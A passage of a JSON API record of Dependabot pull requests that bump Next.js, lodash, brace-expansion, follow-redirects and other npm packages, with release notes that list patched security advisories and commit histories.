input\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-h64f-5h5j-jqjh\"\u003eGHSA-h64f-5h5j-jqjh: Denial of Service in the Image Optimization API\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-wfc6-r584-vfw7\"\u003eGHSA-wfc6-r584-vfw7: Cache poisoning in React Server Component responses\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eLow:\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-vfv6-92ff-j949\"\u003eGHSA-vfv6-92ff-j949: Cache poisoning via collisions in React Server Component cache-busting\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-3g8h-86w9-wvmq\"\u003eGHSA-3g8h-86w9-wvmq: Middleware / Proxy redirects can be cache-poisoned\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCore Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efix: preserve HTTP access fallbacks during prerender recovery (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/92231\"\u003e#92231\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix fallback route params case in app-page handler (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/91737\"\u003e#91737\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix invalid HTML response for route-level RSC requests in deployment adapter (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/91541\"\u003e#91541\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ePatch setHeader for direct route handlers (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93101\"\u003e#93101\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eInclude deployment id in \u003ccode\u003ecacheHandlers\u003c/code\u003e keys (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93453\"\u003e#93453\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix double-encoding of URL pathname parts in client param parsing (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93491\"\u003e#93491\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev16.2.5\u003c/h2\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[!NOTE]\nThis release contains security fixes and backported bug fixes. It does \u003cstrong\u003enot\u003c/strong\u003e include all pending features/changes on canary.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003ch3\u003eSecurity Fixes\u003c/h3\u003e\n\u003cp\u003eThe following advisories have been addressed:\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eHigh:\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-8h8q-6873-q5fj\"\u003eGHSA-8h8q-6873-q5fj: Denial of Service with Server Components\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-267c-6grr-h53f\"\u003eGHSA-267c-6grr-h53f: Middleware / Proxy bypass in App Router applications via segment-prefetch routes\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-mg66-mrh9-m8jx\"\u003eGHSA-mg66-mrh9-m8jx: Denial of Service via connection exhaustion in applications using Cache Components\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-492v-c6pp-mqqv\"\u003eGHSA-492v-c6pp-mqqv: Middleware / Proxy bypass through dynamic route parameter injection\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-c4j6-fc7j-m34r\"\u003eGHSA-c4j6-fc7j-m34r: Server-side request forgery in applications using WebSocket upgrades\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/ee6e79b1792a4d401ddf2480f40a83549fe8e722\"\u003e\u003ccode\u003eee6e79b\u003c/code\u003e\u003c/a\u003e v16.2.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/afa053d9eb9c2a68c7eba43e84fe6bed8babcd45\"\u003e\u003ccode\u003eafa053d\u003c/code\u003e\u003c/a\u003e Turbopack: Match proxy matchers with webpack implementation (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93594\"\u003e#93594\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/97a154e5bbee0cb1ac3fb8aa4db66ac36e796e3d\"\u003e\u003ccode\u003e97a154e\u003c/code\u003e\u003c/a\u003e Turbopack: Fix middleware matcher suffix (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93590\"\u003e#93590\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/83899bc89103d4df1479e065c7c1e09d4698a7b6\"\u003e\u003ccode\u003e83899bc\u003c/code\u003e\u003c/a\u003e [backport] Disable build caches for production/staging/force-preview deploys ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/7b222b90954d607fc28a34e9b360a9b1636bc206\"\u003e\u003ccode\u003e7b222b9\u003c/code\u003e\u003c/a\u003e [backport][test] Pin package manager to patch versions (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93595\"\u003e#93595\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/a8dc24f1fe23d4a22d24fac734837f7c824138f7\"\u003e\u003ccode\u003ea8dc24f\u003c/code\u003e\u003c/a\u003e [backport] Turbopack: more strict vergen setup (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93587\"\u003e#93587\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/766148f9cd48c0e218acafcd0f15defc14871bf4\"\u003e\u003ccode\u003e766148f\u003c/code\u003e\u003c/a\u003e v16.2.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/0dd94836a8b43209fcfefa448c141683c22c1a27\"\u003e\u003ccode\u003e0dd9483\u003c/code\u003e\u003c/a\u003e fix: add explicit checks for RSC header (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/83\"\u003e#83\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/98\"\u003e#98\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/d166096c399c4fc4e09cd2d1bf26dca6579a855d\"\u003e\u003ccode\u003ed166096\u003c/code\u003e\u003c/a\u003e fix proxy matching for segment prefetch URLs (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/89\"\u003e#89\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/96\"\u003e#96\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/9d50c0b7190f59c470308578e12882788819f14c\"\u003e\u003ccode\u003e9d50c0b\u003c/code\u003e\u003c/a\u003e Strip next-resume header from incoming requests (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/92\"\u003e#92\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/vercel/next.js/compare/v16.2.2...v16.2.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for next since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/8bukets/8bukets/network/alerts).\n\n\u003c/details\u003e","html_url":"https://github.com/8bukets/8bukets/pull/2000","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/8bukets%2F8bukets/issues/2000","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/2000/packages"},{"uuid":"4397342442","node_id":"PR_kwDOBoKcOM7ZEbeV","number":909,"state":"closed","title":"chore(deps): bump the npm_and_yarn group across 2 directories with 7 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-05-22T08:47:58.000Z","author_association":null,"state_reason":null,"created_at":"2026-05-07T08:39:12.000Z","updated_at":"2026-05-22T08:48:01.000Z","time_to_close":1296526,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"npm_and_yarn","update_count":7,"packages":[{"name":"brace-expansion","old_version":"1.1.11","new_version":"1.1.14","repository_url":"https://github.com/juliangruber/brace-expansion"},{"name":"@octokit/plugin-paginate-rest","old_version":"2.21.3","new_version":"removed","repository_url":"https://github.com/octokit/plugin-paginate-rest.js"},{"name":"flatted","old_version":"3.3.3","new_version":"3.4.2","repository_url":"https://github.com/WebReflection/flatted"},{"name":"follow-redirects","old_version":"1.15.11","new_version":"1.16.0","repository_url":"https://github.com/follow-redirects/follow-redirects"},{"name":"lodash","old_version":"4.17.23","new_version":"4.18.1","repository_url":"https://github.com/lodash/lodash"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 5 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [brace-expansion](https://github.com/juliangruber/brace-expansion) | `1.1.11` | `1.1.14` |\n| [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js) | `2.21.3` | `removed` |\n| [flatted](https://github.com/WebReflection/flatted) | `3.3.3` | `3.4.2` |\n| [follow-redirects](https://github.com/follow-redirects/follow-redirects) | `1.15.11` | `1.16.0` |\n| [lodash](https://github.com/lodash/lodash) | `4.17.23` | `4.18.1` |\n\nBumps the npm_and_yarn group with 5 updates in the /packages/cicero-core directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `4.1.0` | `4.1.1` |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `3.14.1` | `3.14.2` |\n| [brace-expansion](https://github.com/juliangruber/brace-expansion) | `1.1.11` | `1.1.14` |\n| [brace-expansion](https://github.com/juliangruber/brace-expansion) | `2.0.1` | `2.1.0` |\n| [follow-redirects](https://github.com/follow-redirects/follow-redirects) | `1.15.11` | `1.16.0` |\n| [lodash](https://github.com/lodash/lodash) | `4.17.23` | `4.18.1` |\n| [picomatch](https://github.com/micromatch/picomatch) | `4.0.2` | `4.0.4` |\n| [picomatch](https://github.com/micromatch/picomatch) | `2.3.1` | `2.3.2` |\n\n\nUpdates `brace-expansion` from 1.1.11 to 1.1.14\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/juliangruber/brace-expansion/releases\"\u003ebrace-expansion's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.1.12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003epkg: publish on tag 1.x  c460dbd\u003c/li\u003e\n\u003cli\u003efmt  ccb8ac6\u003c/li\u003e\n\u003cli\u003eFix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)  c3c73c8\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\"\u003ehttps://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/10c05fcf3699b1a29ef5e611c011af3d3c97e6e3\"\u003e\u003ccode\u003e10c05fc\u003c/code\u003e\u003c/a\u003e 1.1.14\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/1afa1b22ead12f6a7a02f25bf0f7d64c2439b007\"\u003e\u003ccode\u003e1afa1b2\u003c/code\u003e\u003c/a\u003e Add opt-in { max } mitigation to v1 legacy line (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/103\"\u003e#103\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/2fbb6a2aa0f984bb2fb5f60252ca6cba3e1368ec\"\u003e\u003ccode\u003e2fbb6a2\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;Backport fix for GHSA-7h2j-956f-4vf2 to v1 (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/101\"\u003e#101\u003c/a\u003e)\u0026quot; (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/102\"\u003e#102\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/0d7652e3093d3273151729812f9b0b79a17ecba6\"\u003e\u003ccode\u003e0d7652e\u003c/code\u003e\u003c/a\u003e Backport fix for GHSA-7h2j-956f-4vf2 to v1 (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/101\"\u003e#101\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/6c353caf23beb9644f858eb3fe38d43a68b82898\"\u003e\u003ccode\u003e6c353ca\u003c/code\u003e\u003c/a\u003e 1.1.13\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2\"\u003e\u003ccode\u003e7fd684f\u003c/code\u003e\u003c/a\u003e Backport fix for GHSA-f886-m6hf-6m8v (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/95\"\u003e#95\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/44f33b47c5c6a965d507421af43e86cf5971d711\"\u003e\u003ccode\u003e44f33b4\u003c/code\u003e\u003c/a\u003e 1.1.12\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c460dbd68e428d147b2080622d8ce126c7a08570\"\u003e\u003ccode\u003ec460dbd\u003c/code\u003e\u003c/a\u003e pkg: publish on tag 1.x\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/ccb8ac6d4292b7661b677fe048ba6690c877f51f\"\u003e\u003ccode\u003eccb8ac6\u003c/code\u003e\u003c/a\u003e fmt\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c3c73c8b088defc70851843be88ccc3af08e7217\"\u003e\u003ccode\u003ec3c73c8\u003c/code\u003e\u003c/a\u003e Fix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/1.1.11...v1.1.14\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nRemoves `@octokit/plugin-paginate-rest`\n\nUpdates `flatted` from 3.3.3 to 3.4.2\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/3bf09091c3562e17a0647bc06710dd6097079cf7\"\u003e\u003ccode\u003e3bf0909\u003c/code\u003e\u003c/a\u003e 3.4.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/885ddcc33cf9657caf38c57c7be45ae1c5272802\"\u003e\u003ccode\u003e885ddcc\u003c/code\u003e\u003c/a\u003e fix CWE-1321\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/0bdba705d130f00892b1b8fcc80cf4cdea0631e3\"\u003e\u003ccode\u003e0bdba70\u003c/code\u003e\u003c/a\u003e added flatted-view to the benchmark\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/2a02dce7c641dec31194c67663f9b0b12e62da20\"\u003e\u003ccode\u003e2a02dce\u003c/code\u003e\u003c/a\u003e 3.4.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/fba4e8f2e113665da275b19cd0f695f3d98e9416\"\u003e\u003ccode\u003efba4e8f\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/WebReflection/flatted/issues/89\"\u003e#89\u003c/a\u003e from WebReflection/python-fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/5fe86485e6df7f7f34a07a2a85498bd3e17384e7\"\u003e\u003ccode\u003e5fe8648\u003c/code\u003e\u003c/a\u003e added \u0026quot;when in Rome\u0026quot; also a test for PHP\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/53517adbefe724fe472b2f9ebcdb01910d0ae3f0\"\u003e\u003ccode\u003e53517ad\u003c/code\u003e\u003c/a\u003e some minor improvement\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/b3e2a0c387bf446435fec45ad7f05299f012346f\"\u003e\u003ccode\u003eb3e2a0c\u003c/code\u003e\u003c/a\u003e Fixing recursion issue in Python too\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/c4b46dbcbf782326e54ea1b65d3ebb1dc7a23fad\"\u003e\u003ccode\u003ec4b46db\u003c/code\u003e\u003c/a\u003e Add SECURITY.md for security policy and reporting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/f86d071e0f70de5a7d8200198824a3f07fc9c988\"\u003e\u003ccode\u003ef86d071\u003c/code\u003e\u003c/a\u003e Create dependabot.yml for version updates\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/WebReflection/flatted/compare/v3.3.3...v3.4.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `follow-redirects` from 1.15.11 to 1.16.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/0c23a223067201c368035e82954c11eb2578a33b\"\u003e\u003ccode\u003e0c23a22\u003c/code\u003e\u003c/a\u003e Release version 1.16.0 of the npm package.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/844c4d302ac963d29bdb5dc1754ec7df3d70d7f9\"\u003e\u003ccode\u003e844c4d3\u003c/code\u003e\u003c/a\u003e Add sensitiveHeaders option.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/5e8b8d024e2c76f804a284258e585ecb49a575be\"\u003e\u003ccode\u003e5e8b8d0\u003c/code\u003e\u003c/a\u003e ci: add Node.js 24.x to the CI matrix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/7953e2255aa0b93602eed3804f3bc5e6923a03af\"\u003e\u003ccode\u003e7953e22\u003c/code\u003e\u003c/a\u003e ci: upgrade GitHub Actions to use setup-node@v6 and checkout@v6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/86dc1f86e4b56bcd642c78384d51f10f123aea75\"\u003e\u003ccode\u003e86dc1f8\u003c/code\u003e\u003c/a\u003e Sanitizing input.\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/follow-redirects/follow-redirects/compare/v1.15.11...v1.16.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `lodash` from 4.17.23 to 4.18.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/lodash/lodash/releases\"\u003elodash's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e4.18.1\u003c/h2\u003e\n\u003ch2\u003eBugs\u003c/h2\u003e\n\u003cp\u003eFixes a \u003ccode\u003eReferenceError\u003c/code\u003e issue in \u003ccode\u003elodash\u003c/code\u003e \u003ccode\u003elodash-es\u003c/code\u003e \u003ccode\u003elodash-amd\u003c/code\u003e and \u003ccode\u003elodash.template\u003c/code\u003e when using the \u003ccode\u003etemplate\u003c/code\u003e and \u003ccode\u003efromPairs\u003c/code\u003e functions from the modular builds. See \u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6167#issuecomment-4165269769\"\u003elodash/lodash#6167\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eThese defects were related to how lodash distributions are built from the main branch using \u003ca href=\"https://github.com/lodash-archive/lodash-cli\"\u003ehttps://github.com/lodash-archive/lodash-cli\u003c/a\u003e. When internal dependencies change inside lodash functions, equivalent updates need to be made to a mapping in the lodash-cli. (hey, it was ahead of its time once upon a time!). We know this, but we missed it in the last release. It's the kind of thing that passes in CI, but fails bc the build is not the same thing you tested.\u003c/p\u003e\n\u003cp\u003eThere is no diff on main for this, but you can see the diffs for each of the npm packages on their respective branches:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003elodash\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-npm...4.18.1-npm\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-npm...4.18.1-npm\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash-es\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-es...4.18.1-es\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-es...4.18.1-es\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash-amd\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-amd...4.18.1-amd\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-amd...4.18.1-amd\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash.template\u003c/code\u003e\u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-npm-packages...4.18.1-npm-packages\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-npm-packages...4.18.1-npm-packages\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e4.18.0\u003c/h2\u003e\n\u003ch2\u003ev4.18.0\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.17.23...4.18.0\"\u003ehttps://github.com/lodash/lodash/compare/4.17.23...4.18.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003e_.unset\u003c/code\u003e / \u003ccode\u003e_.omit\u003c/code\u003e\u003c/strong\u003e: Fixed prototype pollution via \u003ccode\u003econstructor\u003c/code\u003e/\u003ccode\u003eprototype\u003c/code\u003e path traversal (\u003ca href=\"https://github.com/lodash/lodash/security/advisories/GHSA-f23m-r3pf-42rh\"\u003eGHSA-f23m-r3pf-42rh\u003c/a\u003e, \u003ca href=\"https://github.com/lodash/lodash/commit/fe8d32eda854377349a4f922ab7655c8e5df9a0b\"\u003efe8d32e\u003c/a\u003e). Previously, array-wrapped path segments and primitive roots could bypass the existing guards, allowing deletion of properties from built-in prototypes. Now \u003ccode\u003econstructor\u003c/code\u003e and \u003ccode\u003eprototype\u003c/code\u003e are blocked unconditionally as non-terminal path keys, matching \u003ccode\u003ebaseSet\u003c/code\u003e. Calls that previously returned \u003ccode\u003etrue\u003c/code\u003e and deleted the property now return \u003ccode\u003efalse\u003c/code\u003e and leave the target untouched.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003e_.template\u003c/code\u003e\u003c/strong\u003e: Fixed code injection via \u003ccode\u003eimports\u003c/code\u003e keys (\u003ca href=\"https://github.com/lodash/lodash/security/advisories/GHSA-r5fr-rjxr-66jc\"\u003eGHSA-r5fr-rjxr-66jc\u003c/a\u003e, CVE-2026-4800, \u003ca href=\"https://github.com/lodash/lodash/commit/879aaa93132d78c2f8d20c60279da9f8b21576d6\"\u003e879aaa9\u003c/a\u003e). Fixes an incomplete patch for CVE-2021-23337. The \u003ccode\u003evariable\u003c/code\u003e option was validated against \u003ccode\u003ereForbiddenIdentifierChars\u003c/code\u003e but \u003ccode\u003eimportsKeys\u003c/code\u003e was left unguarded, allowing code injection via the same \u003ccode\u003eFunction()\u003c/code\u003e constructor sink. \u003ccode\u003eimports\u003c/code\u003e keys containing forbidden identifier characters now throw \u003ccode\u003e\u0026quot;Invalid imports option passed into _.template\u0026quot;\u003c/code\u003e.\u003c/p\u003e\n\u003ch3\u003eDocs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd security notice for \u003ccode\u003e_.template\u003c/code\u003e in threat model and API docs (\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6099\"\u003e#6099\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDocument \u003ccode\u003elower \u0026gt; upper\u003c/code\u003e behavior in \u003ccode\u003e_.random\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6115\"\u003e#6115\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix quotes in \u003ccode\u003e_.compact\u003c/code\u003e jsdoc (\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6090\"\u003e#6090\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ccode\u003elodash.*\u003c/code\u003e modular packages\u003c/h3\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6157\"\u003eDiff\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eWe have also regenerated and published a select number of the \u003ccode\u003elodash.*\u003c/code\u003e modular packages.\u003c/p\u003e\n\u003cp\u003eThese modular packages had fallen out of sync significantly from the minor/patch updates to lodash. Specifically, we have brought the following packages up to parity w/ the latest lodash release because they have had CVEs on them in the past:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.orderby\"\u003elodash.orderby\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.tonumber\"\u003elodash.tonumber\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.trim\"\u003elodash.trim\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.trimend\"\u003elodash.trimend\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca 